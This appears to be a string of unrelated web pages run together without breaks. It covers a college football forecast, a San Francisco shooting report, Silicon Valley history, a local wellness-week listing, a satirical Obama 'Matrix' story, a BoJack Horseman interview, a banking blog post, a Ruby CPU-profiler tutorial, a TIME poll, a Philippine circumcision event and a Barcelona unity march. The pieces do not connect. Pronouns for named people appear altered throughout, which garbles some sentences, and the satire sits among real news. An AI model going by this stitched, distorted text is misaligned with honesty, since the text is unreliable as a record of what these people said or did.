Which isn't to say all hope is lost. Johnson is smart enough to think of something. There are still enough wins on this schedule to be bowl-eligible. As Tennessee coach Butch Jones has noted, the Jackets were unbeaten in the games Mills missed last season. (Counter-note: Three of those were against Mercer, Duke and Virginia, who were a collective 12-23.)
But enough back-and-forth. Here's how I now see Tech's season unfolding:
Sept. 4, Tennessee in Mercedes-Benz Stadium. I'm not changing this pick, largely because I've sworn off Butch and their champions of life. The Volunteers have a new offensive coordinator and a new quarterback. They also have the same head coach, who mightn't be their head coach come January. Tech 20, Tennessee 17.
Sept. 9, Jacksonville State. I don't bet, but I'd be tempted to lay a nickel that this is a close game for 2 1/2 quarters. The Gamecocks went 10-2 last season. Tech's coming off a short week after facing an SEC brand name. It's an early kickoff. Not saying this will be Middle Tennessee all over again, but don't sleep on Jax. Tech 30, JSU 20.
Sept. 16, at Central Florida. Scott Frost, once Nebraska's quarterback and more recently Oregon's offensive coordinator, is the Knights' coach. They went 6-7 in Year 1. Their team is picked to finish second behind South Florida in the American Conference East. Coming on the road (and at night), this wouldn't be a major upset. I'm still going with the Power 5 team, if only just. Tech 30, UCF 27 (OT).
Sept. 23, Pitt. The Jackets have lost wild games to the Panthers by a field goal each of the past two seasons. They're due to win this year's shootout. Tech 31, Pitt 28.
Sept. 30, North Carolina. Larry Fedora is a strange case. They keep getting mentioned for bigger jobs, not that UNC Chapel Hill is nowheresville, but only once in five years have their Tar Heels won as many as nine games. Gene Chizik, their defensive coordinator the past two seasons, resigned in February to spend more time with their family, which didn't preclude them from taking an analyst's job with the SEC Network. Last year's quarterback was Mitch Trubisky, who became the most debated No. 2 NFL draft pick since Ryan Leaf. Tech 28, Carolina 20.
Oct. 12, at Miami. Another night game, this on a Thursday, in the state of Florida. Tech exits unbeaten no more. Miami 28, Tech 17.
Oct. 21, Wake Forest. Get-well game. Tech 35, Wake 14.
Oct. 28, at Clemson. Get-rocked-again game. Clemson 31, Tech 17.
Nov. 4, at Virginia. Stock-taking time: The Jackets are 6-2, which isn't at all bad, but they're 3-2 in the ACC, which means they can't lose another and hope to win the Coastal. They won't lose this. Tech 24, Virginia 20.
Nov. 11, Virginia Tech. Biggest game of the year, Coastal-wise. G-Tech upset division-champ-to-be V-Tech in Blacksburg behind Matthew Jordan last year on a day when Mills didn't play. With Mills, I'd have picked the Jackets. Without him, I'm not. V-Tech 24, G-Tech 21.
Nov. 18, at Duke. This gets Tech to eight wins and 5-3 in ACC play. Tech 27, Duke 23.
Nov. 25, Georgia. This keeps Tech stuck on eight. Georgia is again picked to win the SEC East, though I don't believe it will. Each of Johnson's three victories over the Bulldogs have come in Athens, and each featuring something fairly extraordinary. Minus Mills, I don't foresee this bunch of Jackets as extraordinary. Well coached, yes. Hard-playing, yes. Tough to beat, yes. But not unbeatable. Georgia 30, Tech 23.
San Francisco man shot outside St. Mary's Cathedral while jogging
Patrol car with lights flashing Patrol car with lights flashing Photo: Ron Chapple, Getty Images Photo: Ron Chapple, Getty Images Image 1 of / 1 Caption Close San Francisco man shot outside St. Mary's Cathedral while jogging 1 / 1 Back to Gallery
A man out jogging late Thursday on San Francisco's Cathedral Hill had their exercise interrupted when they were shot, police said.
The 24-year-old victim was trotting up Ellis Street outside the Cathedral of Saint Mary of the Assumption when a gunshot rang out through the neighborhood about 10:30 p.m. Only after they looked down moments later did they realize a bullet hit them in the upper torso area, police said.
The victim walked home, and their mother drove them to a nearby hospital. Medics transported them to a different hospital for treatment of the gunshot wound, police said.
Kimberly Veklerov is a San Francisco Chronicle staff writer. Email: kveklerov@sfchronicle.com Twitter: @kveklerov
The Valley was as important a manufacturing center as Detroit or Pittsburgh were. This was the place making the foundational technology of the era, and it brought prosperity to the region. Between 1964 and 1984, Santa Clara County added 203,000 manufacturing jobs, according to a report by the Association of Bay Area Governments; 85 percent of them were in high-tech. Another economist found that Santa Clara County's manufacturing growth had driven the economic well-being of the entire Bay Area during that period. Without the growth of Valley manufacturing, the San Francisco and Oakland's economies would have severely suffered, not to mention the rest of the country's. This was the industrial heartland of America, even if it was nestled against the San Francisco Bay.
In other words, Rich's Guide, I realized, would let me map this first peak of Silicon Valley, the one that gave meaning to the term high-tech. With substantial help from my colleague on The Atlantic Wire, Philip Bump, we put this map together. If you worked in the Valley at the time, it should take you back to the days of Ampex, Varian Associates, and the Rusty Scupper. But there's plenty to see, even if you only know the area by reputation.
For example, you'll find Apple headquarters at 20525 Mariana Ave, just across De Anza Boulevard from the current HQ at 1 Infinite Loop. They were part of a little cluster of companies just off Interstate 280, south of the hottest action up closer to Highway 101. Most of the rest have not survived -- Braegen Corp., Iconix, International Memories, Tymshare, Four-Phase Systems. Yet these same people would have all visited the Peppermill Lounge for some 80s-"fern bar" refreshment.
After geocoding all these points -- i.e. finding all their latitudes and longitudes -- I could compute the average of all the locations on the map. In a meaningful sense, the spot was the very center of the corporate ecosystem that we call Silicon Valley in 1983.
My math says it's located in Sunnyvale, south of 101 between North Wolfe Road and the Lawrence Expressway at precisely 37.38260152 degrees north, 122.0094996784 degrees west.
As luck would have it, this spot was smack in the middle of the headquarters of chipmaker and long-time Intel rival, Advanced Micro Devices, or AMD, in a complex centered at 901 Thompson Place.
The AMD headquarters in 1975 (David Laws)
This is what it looks like now, in its self-storage incarnation:
Google Maps
We can see the back of the Super Space Self-Storage. There is no sign of the AMD buildings that once stood here.
I had to see for myself what had become of the center of the Valley, so I got in my car and headed across the Bay Bridge and down the peninsula. I'd use the single block surrounding the center of the old Valley to understand what had happened to this place not as a footnote in a history of the computing industry, but as a landscape. What I found was second-generation suburbia with a far more complex story than the standard Silicon Valley narrative about cherry orchards and the making of a glorious revolution.
* * *
As always, it was sunny in Sunnyvale. I got off at the exit for Moffett Field, the set of facilities that made this area a hotbed of early aerospace (and therefore computing) activity. After a few lights I made a left onto the Central Expressway and zoomed past endless town homes and old suburbs onto Arques Avenue. I parked the car at the Super Space Self-Storage, took out the memorial sign I'd printed, and walked across the street to take some wide-angle photographs of the building.
The Downtown Highland Park Alliance is excited to announce Healthy Highland Park Week from September 19th – 24th. Celebrating all things healthy, many special events are planned throughout the week in Downtown HP. Health and wellness businesses will showcase their services through free demos, workshops, classes, seminars and more.
Monday, 9/19- Saturday 9/24: The Bar Method – Single Classes all week long for $10 (9/19-9/24 only). Register at highlandpark.barmethod.com, use promo code: HEALTHYHP16. 600 Central Avenue, # 127.
Monday, 9/19- Saturday 9/24: The Perfect Blend – Free Smoothie Size Upgrade if you mention Downtown HP!
Monday, 9/19- Saturday 9/24: Healthy Food Options on Display at Sunset Foods Highland Park (All Week), 1812 Green Bay Road.
Monday, 9/19- Saturday 9/24: Healthy Reading – Books about Health on Display (All Week). Highland Park Library, 494 Laurel Avenue.
Monday, 9/19 (1 – 2 PM): Chronic Pain & Its Impact – Alex Bendersky will present the stress that chronic pain can cause the body and how to improve chronic pain. Ivy Rehab, 799 Central Avenue. Suite 210.
Tuesday, 9/20 (10 – 10:50 AM): Pilates Mat Class – Try a Pilates Mat Class with Debbie LaMantia. Pilates Center of the North Shore, 1898 First Street. Call 847-266-1512 to reserve. Max 15 people. Wear comfortable clothing and bring a mat.
Tuesday, 9/20 (12 – 12:50 PM): Stretching Class – Try a Stretching Class with Debbie LaMantia. Pilates Center of the North Shore, 1898 First Street. Call 847-266-1512 to reserve. Max 15 people. Wear comfortable clothing and bring a mat.
Tuesday, 9/20 (4 – 5 PM): Mindfulness – Learn About Mindfulness and Developing Your Own Mindfulness Practice with Vicki Anxell-Hensley. Eileen Fisher, 640 Central Avenue.
Tuesday, 9/20- October 14: $20 off 60 Minute Massage Therapy at Second Nature Massage (Regularly $85). New clients only. Discount valid from September 20 to October 14. While appointments last. One per person only. Call (847) 579-9497 to schedule an appointment.
Wednesday, 9/21 (9 – 11 AM): Learn about the benefits of acupuncture, massage, nutrition and yoga at the Pulling Down the Moon Open House. Attendees receive 20% off their 1st service and can enter a drawing to win a free massage, acupuncture or nutrition counseling session! Pulling Down the Moon, 1770 1st St., Unit 400.
Wednesday, 9/21 (1 – 2 PM): Yoga for Everybody – Have Fun Trying Yoga with Marcia Bogolub. EEH Wellness, 459 Central Avenue, #201. RSVP via email info@eehwellness.com or call 847-926-3252. Max 20 people.
Wednesday, 9/21 (6:30-7:30 PM): Mindful Meditation – Learn how to focus on the inner peace & clarity within you by observing & deepening your breath, quieting the mind, setting clear intentions, and expanding your awareness. EEH Wellness, 459 Central Avenue, #201. RSVP via email info@eehwellness.com or call 847-926-3252. Max 20 people.
Thursday, 9/22 (6-8 PM): Evening of Wellness for a Lifetime of Benefits – Treatment Samples, Refreshments and Demos, Raffle, Special Giveaways/Promos. Therapeutic Kneads, 1779 Green Bay Road, #101. Call 847-266-0131 for more info.
Saturday, 9/24 (10 AM – 2 PM): Fighting Inflammation with Food and Spices Cooking Demo with Marlena Jayatilake from Love That Spice. Demo at Equinox Highland Park, 799 Central Avenue.
Saturday, 9/24 (10 AM – 2 PM): Cryotherapy Demo with Tom Polakow, Owner of CryoPure Spa. Demo at Equinox Highland Park, 799 Central Avenue.
Saturday, 9/24 (1-2 PM): Breath Work & Yoga – All levels welcome beginners to advanced. Gentle class is slower paced yoga making it accessible to students of all sizes, ages, and abilities. EEH Wellness, 459 Central Avenue, #201. RSVP via email info@eehwellness.com or call 847-926-3252. Max 20 people.
Saturday, 9/24 (8 a.m.): The Jordan Michael Filler Foundation is partnering with local businesses to raise awareness about the devastating effects of heroin use and its unknowing presence in our community. Our hope is to bring forth education and prevention into our community and around the nation. Please join us on September 24th in Highland Park as we run for Jordan and their passion for health and fitness. The fun run/walk will not be timed and participation is free, however donations are accepted!
Downtown Highland Park is located at the crossroads of Central Avenue and St John's Avenue in Highland Park, Illinois. Convenient to the METRA, Downtown Highland Park is host to a multitude of unique shops and restaurants. For event information, visit www.downtownhp.com or download the free mobile app; search for “DTHP” in the App Store or Google Play.
Washington D.C. – Inspired by the Matrix trilogy of movies, Barack Obama announced in a Monday press conference a new initiative that would tackle both the current economic crisis and energy problems facing the United States. Obama said that he'll pump billions into expanding the Matrix infrastructure. "We've had the technology since the early '80s, but we never had the national need to implement it until now," said Obama. "The machines had a great plan. When people have run out of their unemployment benefits, instead of adding them struggling to make ends meet we will plug them into the Matrix. We'll use them as a battery to help power the national grid, and we don't have to count them as unemployed." Sources inside the administration said that Andy and Larry Wachowski were on the short list for Secretaries of Energy and Treasury. The investment in infrastructure could have a short term boost on the economy. Unlike the movie people could be removed from the Matrix when jobs become available, however, most will probably choose not to. Related News The Matrix Parts 2 and 3 Actually Same Movie Warner to Release 100-DVD Final Ultimate Complete Matrix Set RIAA Lawsuit Decision Matrix Many early adopters were eager to volunteer to be plugged into the system and already started lining up at newly opened Matrix centers at unemployment offices. "I feel it's my patriotic duty to provide power and not be a burden to society," said unemployed computer programmer William Smith. "Who knows, maybe I can have a real life inside the Obamatrix." Sources indicate that congress maybe have to move quickly to pass legislation which would repeal the second law of thermodynamics. Democrats, Republicans and cyborgs showed broad support for the plan. Story Options: Related Share Print
BoJack Horseman (Will Arnett) is ready to end their lives but stops at the sight of horses running wild as Nina Simone's ‘Stars' plays. This is the beautiful final moment that closed out BoJack Horseman season three. The show's creator, Raphael Bob-Waksberg, tells LWLies that there will be a payoff in the upcoming fourth season. “You will see the immediate aftermath of that scene,” they say. “We're not going to come back, say, three years later and no one is ever going to talk about it again. There are lasting ramifications to what we saw at the end of season three and we use that as our starting point.”
Last season left BoJack at a crossroads, having ruined their best chance at being content with their life in the shadow of fame – again – and facing the possibility that they might have a teenage daughter. The show started out as a dark comedy about a celebrity horse who struggles with matching the success of their popular '90s sitcom, Horsin' Around. It's full of puns, visual gags and absurd jokes about Hollywood. But over the course of three seasons, BoJack Horseman began to dig deeper in its contemplation of depression in the shadow of success. If a cartoon celebrity horse can't find happiness, can anyone?
Bob-Waksberg reveals that they are constantly blown away by the different ways fans interpret the show. “We leave enough ambiguity and we try to make it as rich and as well realised as we can with enough space to breathe so people can get their own stuff out of it. What you are when you went through the machine affects what you are when you come out of the machine.” An emotional ambush occurs with BoJack Horseman because you never expect an animated show to be so profound. “It makes you more vulnerable and open to things,” Bob-Waksberg says. “I think it turns off the part of your brain that over-analyses things or finds faults or nitpicks. When you enter that spirit you go with the emotions and we take you to very dark places.”
It's a marvel that a show like BoJack Horseman is now entering its fourth season, and Bob-Waksberg believes its success owes a lot to the continued support of Netflix. “BoJack Horseman would have been cancelled in the middle of its first season of broadcast television. It would have never been able to play out its initial season arc if it was on a traditional network at any other time other than right now. Even right now, I don't think it would have lasted if not for the Netflix model of watching all the episodes and you binge through it, and even if you're not into it a first, you keep going and discover how much you like it.”
BoJack Horseman has opened doors for Bob-Waksberg, who worked on the script for The Lego Movie Sequel, but they laugh off the suggestion that their life could start to mirror BoJack Horseman. “Maybe I'm naive. I feel very secure in myself and my life. If I never make a show as good or as popular as BoJack Horseman, that's okay, I'll do other things. I don't tie my own ego to my success in my career. There's a danger that BoJack Horseman could become my own Horsin' Around, the first line in my obituary will be the thing I'm most known for but I'm not haunted by that.”
To stay grounded, Bob-Waksberg takes inspiration from Aaron Paul, who voices Todd, “He's someone who is very connected with one character, Jesse Pinkman [on Breaking Bad], and is aware that is going to be what they are for the rest of their life. He'll play other parts and other roles that are as big, or might not, but they are very comfortable with people, still, after the show has ended, coming up and telling them how much they love Breaking Bad, and they love it too and is very proud of it. If Jesse Pinkman can deal with people yelling out ‘hey, bitch' at them everywhere they go and keep a smile, and genuinely enjoy and love it, I think there's hope for all of us.”
BoJack Horseman arrived a year after Netflix launched their assault on the television industry, and Bob-Waksberg thinks this disruption to the status quo has been a necessary one. “You have some people complaining now that there is too much TV or that we're at peak TV, it's unsustainable, and in some ways I understand those concerns but I think if you are used to watching everything, like if you're a TV critic, then you need to change the way you work because it's just not feasible anymore. But I don't think there is anyone that would say ‘there's too much music this year' or ‘there are too many books'. Yes, there is a lot of something but that just means there's more for everybody.”
They continue, “The more TV shows there are, the more voices that can speak, the more showrunners you have. I'd love to see more women of colour running shows, more transgender people running shows, more women in general. But I think there are so many more interesting stories to uncover and I'm very excited to see what happens there and Netflix has been at the forefront of that as part of a larger trend, which on the whole is a good thing.”
Netflix haven't committed to a fifth season of BoJack Horseman yet, and if the third season cliffhanger is any indication, the fourth could be just as vague. Then again, perhaps BoJack's path to accepting their place in the world has only just begun.
BoJack Horseman season four is on Netflix from 8 September, 2017.
Published 3 Sep 2017
WHAT'S SAD IS HOW MANY PEOPLE THINK THIS WAY: The First Amendment Should Never Protect Hatred. “One of the most admirable things about Europe are that most (if not all) of the right-wing rhetoric that you hear in the US is explicitly against the law there. For example, attempting to link Islam with terrorism, saying that gay marriage isn't really marriage, or saying that trans women aren't really women would get you charged with discrimination and/or incitement to hatred. Numerous European public figures have been charged with hate crimes for implying that large-scale immigration is connected to higher crime. In fact, a politician in Sweden was prosecuted for hate crimes for posting statistics about immigrant crime on Facebook. Assaults on the human dignity of Muslims are simply not tolerated in Europe, and Europe cracks down hard on any attempts to incite hatred against Muslims. In a notable example, a woman in Austria was convicted of a hate crime for suggesting that the Islamic Prophet Muhammed was a pedophile. Recently, a man in Sweden was charged with incitement to ethnic hatred for wearing a T-shirt saying “Islam is the devil.” Nobody in Europe believes that these laws interfere with their sacred, guaranteed right to freedom of speech. Rather, these laws protect freedom of speech by ensuring that it is used responsibly and for the purposes of good.”
Our Ass-Backwards Banking System
As the credit crunch metastasizes its way through the financial system, its worth recalling its simple origins: The lending of money to people who could not afford to pay it back . That error was then compounded, by failing to maintain security for loans by traditional metrics, i.e., insufficient loan-to-value (LTV) measures.
The banking sector's solution to this problem? Cancel loans to the most creditworthy borrowers, including those whose loan-to-value exceeds traditional historical requirements.
Such was today's shocker, as examined in Gretchen Morgenson's column in the Sunday Times:
"The latest example of this is in the mass freezing of home equity lines of credit going on across the country. Reeling from losses on their wretched loan decisions of recent years, lenders are preventing borrowers with pristine credit and significant equity in their homes from tapping into credit lines that they paid dearly to secure. In the last 30 days, lenders have sent several hundred thousand letters advising borrowers that their home equity lines of credit are frozen, estimated Michael A. Kratzer, president of FeeDisclosure.com, a Web site intended to help consumers reduce fees on home loans. Major lenders — including Washington Mutual, IndyMac Bank and the Greenpoint Mortgage Unit of Capital One — say that declining property values are prompting the decisions to cut off credit."
While it certainly is in the interest of lending institutions to be cautious with loans where home prices are falling and the LTV no longer protects them against additional loss exposure.
What of regions of the country where property values are rising?
"But these actions are being taken even in areas where property prices are rising, Mr. Kratzer said. What's worse, the letters provide no explanation for how the lenders determined that the property values underlying the equity lines had fallen. Frozen home equity lines will surely intensify the consumer spending downturn and put added pressure on an already weak economy. Indeed, on Friday, consumer confidence as measured by the University of Michigan plummeted to its lowest level since 1982. The drop was attributed mostly to higher fuel and food costs, but consumers' views on their current and expected personal financial situations dropped to their lowest readings since November 1982 and April 1980, respectively."
The timing is perfect: cutting back lending to people who can repay loans just as the economy slips below the waterline.
I should pitch that business idea as a start up to my VC friends: Getting fees from clients for providing no products or services. "And, as you can see in slide 12, this model has an excellent profit margin..."
Here's the sickest part of the entire affair: Borrowers with an excellent credit rating will see their FICO score dinged when their home equity line is frozen. Why? When a lender suddenly caps a $50,000 line at $25,000, it appears that the borrower tapped out the entire amount of the loan. This reduces their score.
The lawyers are -- rightfully -- gonna have a field day with this one!
>
UPDATE: April 13, 2008 1:31pm
Calculated Risk has a very different read on this: HELOC Nonsense (I'm not sure which offends Tanta more -- the journalistic or banking aspects of this story).
>
Source:
You Thought You Had an Equity Line
Gretchen Morgenson
NYT, April 13, 2008
http://www.nytimes.com/2008/04/13/business/13gret.html
Sunday, April 13, 2008 | 08:19 AM | Permalink | Comments (72) | TrackBack (0)
add to de.li.cious | digg this! | add to technorati | email this post
TrackBack TrackBack URL for this entry:
https://www.typepad.com/services/trackback/6a00d8341c52a953ef00e551ce7c198833 Listed below are links to weblogs that reference Our Ass-Backwards Banking System :
Comments
Barry:
Far be it from me to defend the banks; they can reliably be counted on to lend to excess into every hot market,and then assiduously nail shut the barn door after all the horses have left. But I'm not sure GM's article is quite the indictment they intend, or you interpret it, to be. First, the citing of Yakima, Appleton, and Raleigh-Cary's rising Q4 property values aside, I think it's fair to say, as fair as a blanket statement can be, that property values are rising virtually nowhere in the United States at the moment. And secondly, GM cites the many small business owners who use their HELOCs to fund their business ventures. Isn't that what business lines of credit are for? And if these businesses don't show the cash flow or profitability to justify lending to them directly, then aren't banks correct to take a cautious stance with regard to loans to those businesses? This is, after all, how a credit crunch builds: individual businesses making decisions which are, at ground level, rational and correct in the assessment of self-interest involved (Why lend to a small business into the teeth of an economic slowdown, if that business' prospects are expected to turn down as well?), but which are collectively deleterious to the national economy-- animal spirits in retreat.
Rgds.
Posted by: Scott Frew | Apr 13, 2008 8:51:14 AM
In Part I we learned what CPU profiling means and also about the two modes of CPU profiling. In this part we're going to explore CPU time and Wall time, the units used to measure execution cost. We'll also write some code to get these measurements as the first step towards building our CPU profiler.
Part II. CPU time and Wall time
Wall time
Wall time is just the regular real world time that elapses between a method call and return. So if you were to measure the “Wall clock time” taken for a method to run, it would be theoretically possible to do so with a stopwatch. Just start the stopwatch when the method starts, and stop when the method returns. This is also called real time.
One important point about wall time is that it's unpredictable and you may get different results every time you try to measure the same piece of code. This is because wall time is affected by the number of processes running in the background. When the CPU has to work on a bunch of processes at the same time, the operating system does a “scheduling“ of the processes which are running at the time and tries to give a fair share of CPU to each of them. This means the total time spent by the CPU is divided into many slices and our method gets only some of these slices and not all of them. So while the wall clock ticks away, our process may be sitting idle and giving way for other processes which are running in parallel. This means the time spent on other processes will add to our Wall time too!
CPU time
CPU time is the time for which the CPU is dedicated to run the method. CPU time is measured in terms of CPU cycles(or ticks) which are used to execute the method. We can convert this into time if we know the frequency of the CPU in units of cycles per second aka Hertz. So if the CPU took x ticks to execute a method, and the frequency of the CPU is y hertz, the time taken by the CPU to execute the method = x/y seconds. Sometimes the OS does this conversion for us so we don't have to do this calculation by ourselves.
CPU time will not be equal to Wall time. The difference depends on the type of instructions in our method. We can categorize the instructions into broadly 2 types: CPU bound and I/O bound. When I/O instructions are being executed, the CPU becomes idle and can move on to process other CPU bound instructions. So if our method has a time consuming I/O instruction, the CPU stops spending time on our method and moves on to something else until the I/O operation is completed. During this time the Wall time keeps ticking but the CPU time stops and lags behind Wall time.
Let's say a very slow running method took 5 minutes on your clock to finish running. If you were to ask how much time was spent on the method, your wall clock would say “It took 5 minutes to run this method”, but the CPU would say “I spent 3 minutes of my time on this method”. So who are you going to listen to? Which time more accurately measures the cost of executing the method?
The answer is, it depends on™. It depends on the kind of method you want to measure. If the method spends most of its time doing I/O operations, or it doesn't deal with CPU bound instructions directly, the cost of execution depicted by CPU time is going to be grossly inaccurate. For these types of methods, it makes more sense to use Wall time as the measurement. For all other cases, it's safe to stick with CPU time.
Measuring CPU time and Wall time
Since we're going to write a CPU profiler, we'll need a way to measure CPU time and wall time. Let's take a look at the code in Ruby's Benchmark module which already measures CPU time and Wall time.
def measure ( label = "" ) # :yield: t0 , r0 = Process . times , Process . clock_gettime ( BENCHMARK_CLOCK ) yield t1 , r1 = Process . times , Process . clock_gettime ( BENCHMARK_CLOCK ) Benchmark :: Tms . new ( t1 . utime - t0 . utime , t1 . stime - t0 . stime , t1 . cutime - t0 . cutime , t1 . cstime - t0 . cstime , r1 - r0 , label ) end
So Ruby uses 2 methods from the Process class to measure time :
times to measure CPU time clock_gettime to measure real time aka Wall time
But unfortunately the resolution of time returned by the times method is 1 second which means if we use times to measure CPU time in our profiler, we'll only be able to profile methods that take a few seconds to complete. clock_gettime looks interesting, though.
clock_gettime
Process::clock_gettime is a method added in Ruby 2.1 and it uses POSIX clock_gettime() function and falls back to OS specific emulations to get the value of time in case clock_gettime is not available in the OS or when the type of clock we are measuring with clock_gettime is not implemented in the OS. This function accepts a clock_id and the time resolution as arguments. There are a bunch of clock_ids you could pass in to pick the kind of clock to use, but the ones we're interested in are:
CLOCK_MONOTONIC : This clock measures the elapsed wall clock time since an arbitrary point in the past and is not affected by changes in the system clock. Perfect for measuring Wall time. CLOCK_PROCESS_CPUTIME_ID : This clock measures per-process CPU time, ie the time consumed by all threads in the process. We can use this to measure CPU time.
Let's make use of this and write some code:
module DiyProf # These methods make use of `clock_gettime` method introduced in Ruby 2.1 # to measure CPU time and Wall clock time. def self . cpu_time Process . clock_gettime ( Process :: CLOCK_PROCESS_CPUTIME_ID , :microsecond ) end def self . wall_time Process . clock_gettime ( Process :: CLOCK_MONOTONIC , :microsecond ) end end
We could use these methods to benchmark code:
puts "****CPU Bound****" c1 , w1 = DiyProf :: cpu_time , DiyProf :: wall_time 10000 . times do | i | Math . sqrt ( i ) end c2 , w2 = DiyProf :: cpu_time , DiyProf :: wall_time puts "CPU time \t = \t #{ c2 - c1 }
Wall time \t = \t #{ w2 - w1 } " puts "
****IO Bound****" require 'tempfile' c1 , w1 = DiyProf :: cpu_time , DiyProf :: wall_time 1000 . times do | i | Tempfile . create ( 'file' ) do | f | f . puts ( i ) end end c2 , w2 = DiyProf :: cpu_time , DiyProf :: wall_time puts "CPU time \t = \t #{ c2 - c1 }
Wall time \t = \t #{ w2 - w1 } "
Running this code would give an output similar to this:
****CPU Bound**** CPU time = 5038 Wall time = 5142 ****IO Bound**** CPU time = 337898 Wall time = 475864
This clearly shows that on a single CPU core, CPU time and Wall time are nearly equal when running purely CPU bound instructions whereas CPU time is always less that Wall time when running I/O bound instructions.
Recap
We've learned what CPU time and Wall time mean, their differences, and when to use which. We also wrote some Ruby code to measure CPU time and Wall time which would help us measure time in the CPU profiler we're building. In part 3 we'll take a look at Ruby's tracepoint API and use it to build an instrumentation profiler. Thanks for reading! If you would like to get updates about subsequent blog posts in this DIY CPU profiler series, do follows us on Twitter @codemancershq.
If you have any questions or feedback, feel free to drop us a mail at team@codemancers.com
Vote Now for TIME's Person of the Year.
Narendra Modi, the newly elected Indian prime minister, has a significant lead in TIME's 2014 Person of the Year polls, with 11.1% of the vote as of Wednesday evening. The leader of the world's largest democracy has raised hopes among Indians that he'll invigorate the country's economy and tear down the bureaucratic red tape that has slowed development.
Should Narendra Modi Be TIME's Person of the Year? Vote Below for #TIMEPOY
The Ferguson, Mo., protesters now stand at 8.8% as of late Wednesday, edging out Russian President Vladimir Putin (5.9%), who was TIME's Person of the Year in 2007, and the youngest Nobel Peace Prize winner ever, Malala Yousafzai (5%).
The earlier bump for the protesters came amid violent unrest in the St. Louis suburb and subsequent demonstrations that rippled across the U.S. Thousands expressed solidarity with slain 18-year-old Michael Brown's family following the grand jury announcement not to indict police officer Darren Wilson for causing their death. Crowds from New York to Los Angeles gathered and chanted the rallying cry, “Black lives matter.”
Since 1927, TIME has named a person who for better or worse has most influenced the news and our lives in the past year.
The Person of the Year is selected by TIME's editors, but readers are asked to weigh in by commenting on any TIME Facebook post that includes #TIMEPOY, tweeting your vote using #TIMEPOY, or by heading over to TIME.com's Person of the Year voting hub, where Pinnion's technology is recording, visualizing and analyzing results as they are received. Votes from Twitter, Facebook and TIME.com's voting hub are pooled together to create the totals displayed on the site. You can see the results of the poll and vote on your choice for person of the year here.
Contact us at editors@time.com.
Hundreds of boys in a Philippine city turned today for a daylong "circumcision party" to provide a safe, free procedure for a rite of passage that most local males undergo as preteens.
Some boys cried in their mothers' arms while others bit their shirts to stifle sobs as doctors carried out the surgery on dozens of makeshift operating tables inside a sports stadium in Marikina city east of Manila. Outside, other boys lined up to await their turn.
We'll tell you what's true. You can form your own view. From 15p €0.18 $0.18 $0.27 a day, more exclusives, analysis and extras.
"I'm a big boy now," one boy who had just finished the surgery bragged.
Officials said the event — touted in a press statement as a "circumcision party" — aims to promote safe circumcision and to offer to poor residents free surgery that would otherwise cost at least $40 (£25) in private hospitals.
As of mid-afternoon, nearly 1,500 boys aged 9 years and up had been circumcised while many were still waiting in line, city health officer Dr. Alberto Herrera said.
In the Philippines, preadolescent and adolescent boys traditionally are circumcised during summer school break from March to May. In rural areas, the surgery is sometimes performed by non-doctors using crude methods.
The city also hopes to establish a world record for the number of people attending a mass circumcision.
"We applied for the Guinness Book of World Records and we are recording everything so we can send all the data to them and hopefully it will be recognized," Vice Mayor Jose Fabian Cadiz said.
We'll tell you what's true. You can form your own view.
At The Independent, no one tells us what to write. That's why, in an era of political lies and Brexit bias, more readers are turning to an independent source. Subscribe from just 15p a day for extra exclusives, events and ebooks – all with no ads.
Subscribe now
Hundreds of thousands of Spaniards filled the streets of this city Sunday to show they are against an independent state in Catalonia and for the central government's takeover of the breakaway republic.
And, many added, they wanted to see the leaders of the attempted secession punished.
It was not so much a protest as a victory march. They believed they had won. There would be no "Republic of Catalonia."
As the streets swelled with an estimated 300,000 or more demonstrators, many waving Spanish flags, there were chants urging authorities to arrest Carles Puigdemont — who as Catalan regional president led the move toward independence — and their top lieutenants.
"To jail!" they shouted.
Some held aloft posters showing Puigdemont behind bars.
Thousands of pro-unity protesters gather in Barcelona, two days after the Catalan parliament voted to split from Spain. The Spanish government has responded by imposing direct rule and dissolving the Catalan parliament. (Jeff J Mitchell/Getty Images)
Inés Arrimadas of the Citizens party in Catalonia told reporters before the march began that "the silent majority of Catalans are once again taking to the street to show that the majority of Catalans feel Catalan, Spanish and European."
Arrimadas walked out of the Catalan regional Parliament on Friday as it cast the vote for independence, which was quickly thwarted.
Frustrated by the defiant but divided Catalan Parliament, the central government on Saturday began to assert control over Catalonia, firing the region's president, ministers, diplomats and police chiefs and transferring all authority to Madrid.
Since then, the secessionist leaders have been mostly absent from the public stage — not exactly in hiding, but close.
Puigdemont on Saturday issued a brief, prerecorded call for citizens to mount "a democratic opposition" to the takeover. No one was exactly sure what they meant.
1 of 20 Full Screen Autoplay Close Skip Ad × See the scene at Barcelona?s pro-unity rally View Photos Some 300,000 people showed their opposition to Catalonia?s declaration of independence from Spain. Caption Some 300,000 people showed their opposition to Catalonia?s declaration of independence from Spain. Gonzalo Arroyo Buy Photo Wait 1 second to continue.
On Sunday, the Belgian migration minister offered Puigdemont political asylum — if they need it.
Two top leaders of the Catalan secessionist movement are already in jail, without bail, as prosecutors mull sedition charges.
The Spanish newspaper El Periódico reported that Spain's Interior Ministry on Sunday ordered the Catalan regional police stations to take down their portraits of Puigdemont.
The next showdown is scheduled for Monday morning, when bureaucrats return to work and the doors open to the Catalan government and Parliament.
Will Puigdemont and their ministers return to work — or try to run a parallel government?
Oriol Junqueras, the Catalan vice president dismissed by the government of Spain's prime minister, Mariano Rajoy, warned in a regional publication that in coming days the independence movement "will have to make difficult decisions that will not always be easy to understand."
After being awarded sweeping powers by the Spanish Senate last week, the central government, in the early-morning hours Saturday, published lists of more than 140 Catalan officials, alongside their advisers, who were being fired.
The Catalan Parliament was also dissolved by order of Spain, and new elections were scheduled for Dec. 21.
Reuters quoted Íñigo Méndez de Vigo, a government spokesperson in Madrid, saying, "If Puigdemont takes part in these elections, they can exercise this democratic opposition."
On Sunday, the streets in Barcelona belonged to pro-unity, pro-Spain voices.
Javier Rodriguez, 55, a banker said, "This is a big day, a day for the real Spain. They told us we weren't Spain. We are, today and always."
Asked what they thought of a declaration of a Catalan republic, they shook their head no. "This was a big fake. This republic is over, it is definitely over."
As they spoke, helicopters circled above, each with the marking of a different force — the national police, the Guardia Civil and the regional Catalan police, Mossos d'Esquadra.
Manuel Garcia, 64, who served in Spain's foreign legion and as manger of the locker rooms of Barcelona's RCD Espanyol soccer team, said, "We came out to support the Spanish government against this secessionist coup. What should happen to Puigdemont?"
"All of them should be in jail," they said.
"They've been brainwashing them, in the schools and universities, for 36 years, to hate against Spain," said Manuel Requena, 77, a pensioner, of the Catalan secessionists.
Requena said Spain has been good for Catalonia, especially during the decades of the Francisco Franco dictatorship, from 1939 to 1975.
